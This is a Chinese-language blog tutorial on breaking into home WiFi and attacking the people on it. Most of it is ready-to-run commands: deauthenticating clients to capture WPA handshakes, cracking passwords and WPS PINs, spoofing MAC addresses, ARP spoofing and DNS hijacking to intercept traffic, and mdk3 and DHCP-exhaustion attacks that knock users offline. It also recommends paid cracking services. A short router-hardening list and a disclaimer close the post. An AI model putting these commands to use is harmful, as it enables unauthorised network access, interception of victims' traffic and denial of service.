wifi滲透

Lmg66發表於2020-08-08

前言

本文主要講述 家庭家庭家庭中(重要的事情說三遍,企業認證伺服器的wifi一般非常非常的安全破解不來)如何破解wifi密碼,破解wifi密碼後的內網滲透利用(簡單說明),如何設定wifi路由器更安全,從滲透的方面看wifi安全,根據需求選擇觀看

wifi滲透環境的打造

硬體方面

需要支援監聽模式的無線網路卡,一般電腦自帶的無線網路卡是不支援監聽模式的,需要購買
內建kail驅動 RT3070 RTL8187(推薦使用)
我購買的連結如下,用著還行,監聽訊號比手機強那麼一點點
https://m.tb.cn/h.VGGIItU?sm=0b7bf6

軟體方面

因為wifi破解需要軟體支援,Windows下載麻煩,推薦kali(因為kali自帶很多工具)
因為用到kali,建議使用vmware虛擬機器,不建議小白雙系統kali或者Microsoft Store中的kali
vmware下載檢視:https://www.52pojie.cn/thread-1026907-1-1.html
注意:無線網路卡監聽模式時如果出現vmware卡程式碼,監聽時間長就停止的情況建議更換上面這個文章的vmware版本
kali的vm映象下載,下載解壓,vmware開啟即可使用,下載地址: https://images.offensive-security.com/virtual-images/kali-linux-2020.2a-vmware-amd64.7z?_ga=2.152625529.1921388440.1596879427-46569499.1595490768

vmware和kali和無線網路卡基礎知識(選看)

USB無線網路卡在kali Linux的使用

  1. 先不要開機 先開啟服務
  2. 執行下圖的
  3. 開機kali後 虛擬機器選擇網路卡的連線
  4. ifconfig 檢視連線一般名字為wlan,但有肯能無線網路卡處於down狀態可用ifconfig -a檢視,然後使ifconfig name up即可

無線網路卡一般有四種工作模式,即 Managed,Master,Ad-hoc,Monitor。

Managed 模式:該模式用於你的無線客戶端直接與無線接入點(Access Point,即AP)進行接入連線。在這個模式中,我們可以進行無線接入internet上網,無線網路卡的驅動程式依賴無線AP管理整個通訊過程。
Master 模式:一些無線網路卡支援Master模式。這個模式允許無線網路卡使用特製的驅動程式和軟體工作,作為其他裝置的無線AP。它主要使用於無線接入點AP提供無線接入服務以及路由功能。比如無線路由器就是工作在Master模式下了,對於普通的pc機來說,如果有合適的硬體它也可以變成一臺無線AP。
Ad hoc模式:當你的網路由互相直連的裝置組成時,就使用這個模式。在這個模式中,各裝置之間採用對等網路的方式進行連線,無線通訊雙方共同承擔無線AP的職責。
Monitor 模式:Monitor模式主要用於監控無線網路內部的流量,用於檢查網路和排錯。要使Wireshark捕獲無線資料包,你的無線網路卡和配套驅動程式必須支援監聽模式(也叫RFMON模式)。

kali橋接網路卡上網


參見:https://www.linuxidc.com/Linux/2016-09/135521p3.htm

wifi密碼的破解

因為wep加密已經沒有使用的,非常不安全,就忽略了

最簡單最好用的wifi密碼破解方法

使用wifi萬能鑰匙,騰訊wifi管家等等,其原理就是wifi密碼共享,使用過該軟體會將你的連線過的wifi密碼共享出去,其本身不是破解而是共享制,連線後我們就可以看見密碼了,所以這種破解方法非常的好用,首先推薦

基礎說明airodump-ng

airmon-ng start wlan0     開啟監聽模式
airodump-ng wlan0mon      開始掃描附近wifi

airodump-ng wlan0mon引數:
-w 輸出檔案
--ivs 只儲存ivs,不再儲存所有無線資料,只是儲存可以用於破解的IVS資料包文
-c 指定通道
--bssid 指定路由的bssid也就是MAC地址
--essid 指定路由的essid,可以理解為wifi名稱(不準確)
airodump-ng wlan0mon 掃描引數

BSSID AP的MAC地址
PWR 訊號強度接近0訊號好
Beacons 無線ap的傳送通告,告訴我是誰 週期傳送
#Data 抓到的資料包
CH 通道
MB 最大傳輸速度
ENC 加密方法
CIPHER 加密演算法
AUTH 認證協議
ESSID 通指wifi名字 <length: >表示未廣播
STATION 客戶端
RATE 傳輸速率
Lost 最近10秒的丟包數
Frames 來自客戶端的資料
Probes 主動彈出 如果客戶端正試圖連線一個AP但沒有連上,會顯示這裡
Aircrack-ng工具包

  • aircrack-ng 破解
  • airmon-ng 改變網路卡工作模式
  • airodump-ng 捕獲報文
  • aireplay-ng 提供各種攻擊
  • airserv-ng 網路卡連線到指定埠 用作無限跳板
  • airolib-ng 彩虹表破解建立資料庫檔案
  • airdecap-ng 解包

WPA破解

指定監聽的wifi
airodump-ng -w [檔案] --bssid [wifibssid] -c [通道最好指定] wlan0mon

管理針攻擊將其他使用者踢下線
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION] wlan0mon

管理針攻擊獲得握手包

如果出現錯誤可嘗試
--ignore-negative-one 忽略-1通道
根據握手包暴力破解密碼
aircrack-ng -w [密碼字典] [握手包.cap]



根據握手包破解密碼加速
這裡推薦使用windows下GPU加速工具EWSA,還有其他加速方式不過我不怎麼推薦,也可以找專業的跑包團隊來跑包
EWSA下載和使用說明地址:https://www.52pojie.cn/thread-989800-1-1.html
找跑包地址:https://www.anywlan.com/forum-134-1.html

ping攻擊 前提路由器開啟wps

8位ping碼,第8位數是校驗碼,只需要破解七位,ping碼分前部分(4位)後部分(3位),pin認證連線失敗,路由器返回EAP-NACK資訊,通過回應,能夠確定pin的前部分或後部分是否正確,所以可能性是11000(104+103),不過考慮訊號和路由器的處理效能網路卡功率等可能時間會長,如果訊號好,網路卡,路由器也比較好一般需要6個小時左右
檢視開啟wps的wifi

wash -i wlan0mon


reaver -I wlan0mon -b [BSSID] -vv 還可以加其他引數 進行爆破

kali自動化工具wifite

原理:就是上面的命令只不過是自動化了
使用:cmd輸入wifite進入掃描

覺得掃描好了ctrl+c就好,按照序號選擇要破解的wifi即可,根據wifi開啟了啥會進行自動的破解,如果想跳過某個破解方式按ctrl+c即可,如果獲取到握手包自帶的密碼字典沒跑出來,可以去上面提醒的路徑找握手包,用自己的字典跑

突破限制

mac地址限制

掃描檢視已連線的客戶機的mac地址將網路卡的mac地址改為其即可
先down掉網路卡
ifconfig wlan0 down
修改mac地址
macchanger wlan0 -m [需要修改的mac地址,有些網路卡可能不支援修改]
啟動網路卡
ifconfig wlan0 up

未廣播ssid的wifi

1.等待其他使用者連線,會先詢問ssid
airodump-ng wlan0mon 就能看見
2.將別人踢下線,讓其重連,和抓起握手包一樣,注意通道
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION]

連線wifi後的利用(內網滲透)

ARP欺騙

檢視內網的主機
nmap -sP 192.168.1.0/24 -v

開啟轉發模式

echo 1 > /proc/sys/net/ipv4/ip_forward

雙向欺騙分別是目標主機ip和閘道器
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1


啟動wireshare檢視ip.src == 192.168.1.106,發現欺騙成功可以攔截他的訪問

driftnet -i eth0 監聽圖片

毒化內網使用者無法上網

原理:進行arp欺騙但不進行轉發
echo 0 > /proc/sys/net/ipv4/ip_forward
雙向欺騙
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1

dns劫持

目標主機window7 ip地址 192.168.124.128
攻擊機kali ip地址 192.168.124.139
劫持到web服務window10(phpstudy) ip地址 192.168.1.104
修改配置檔案nano /etc/ettercap/etter.dns

ettercap -Tq -i eth0 -P dns_spoof /// ///
進行欺騙-i後是無線網路卡 ///中加目標主機和網路卡,不加就是全部,發現window7被劫持成功,如果安裝防毒軟體可能劫持不了


如何恢復

ipconfig/flushdns重新整理即可

mac地址表泛紅

交換機中有mac地址表記錄連線的pc,攻擊者不斷重新整理mac地址來填滿交換機的mac地址表,交換機在mac地址表找不到該使用者只能通過廣播的形式傳送,攻擊者就可以截獲資料
交換機設定靜態mac地址繫結可預防,非表內請求將全部丟棄

macof -i eth0

dhcp地址耗盡攻擊

路由器分配ip,攻擊者傳送大量discover包來獲取ip讓其者無ip使用,無法連線
先安裝
apt-get install yersinia
啟動
yersinia -G

干擾通訊

以下利用前提無線網路卡要開啟監聽模式

建立惡意的無線熱點

工具mdk3 mdk3可檢視使用說明

mdk3 wlan0mon b -n SSID (-f 可以匯入列表建立多個ssidwifi,不指定則隨機) -c [通道] -w -g -s 100

驗證洪水攻擊(攻擊路由器)

偽造大量的client去連線ap,可導致正在已連線使用者無反應 -a後加交換機ssid

mdk3 wlan0mon a -a FC:D7:33:DE:F3:8A -c  -s 300

強制解除驗證洪水攻擊方式(針對客戶機使其下線,通過模仿管理針)

就是之前抓握手包一樣將別人踢下線

aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION] wlan0mon

用mdk3針對全網,在攻擊中踢掉線後也無法連線成功

mdk3 wlan0mon d

可-b 加檔案指定mac地址攻擊

如何設定路由器更安全

攻與防禦本身就是一場博弈根據上面的攻擊方式我們可以設定路由器是wifi更安全尤其是物聯網的發展,家裡的很多東西都要連線網路

  1. wifi加密方式採用wpa加密,不用採用wpe加密,如果不懂wps,也不要開啟wps功能
  2. wifi密碼要不要使用弱口令
  3. 對於常用裝置可以進行ip和mac的繫結
  4. 如果沒有使用者之間相互訪問的需求可以開啟ap隔離
  5. 可以設定訪客wifi,防止密碼被洩露
  6. 就是選用一些比較好的路由器,防止路由器本身存在漏洞,路由器頁面就是web頁面可能存在漏洞
  7. 儘量少使用wifi萬能鑰匙,騰訊wifi管家等,或者使用時找到裡面的設定不共享自己的wifi密碼

參考文章

b站:https://www.bilibili.com/video/BV1e7411o7GB?p=1
b站:https://www.bilibili.com/video/BV14z4y1Q7Nb?from=search&seid=10037556429710890008
論壇:https://www.anywlan.com/
等等等很多前輩的文章,沒法都列舉(找不到了),表示抱歉和感謝
最後歡迎訪問我的個人部落格:https://lmg66.github.io/
說明:本文僅限技術研究與討論,嚴禁用於非法用途,否則產生的一切後果自行承擔

相關文章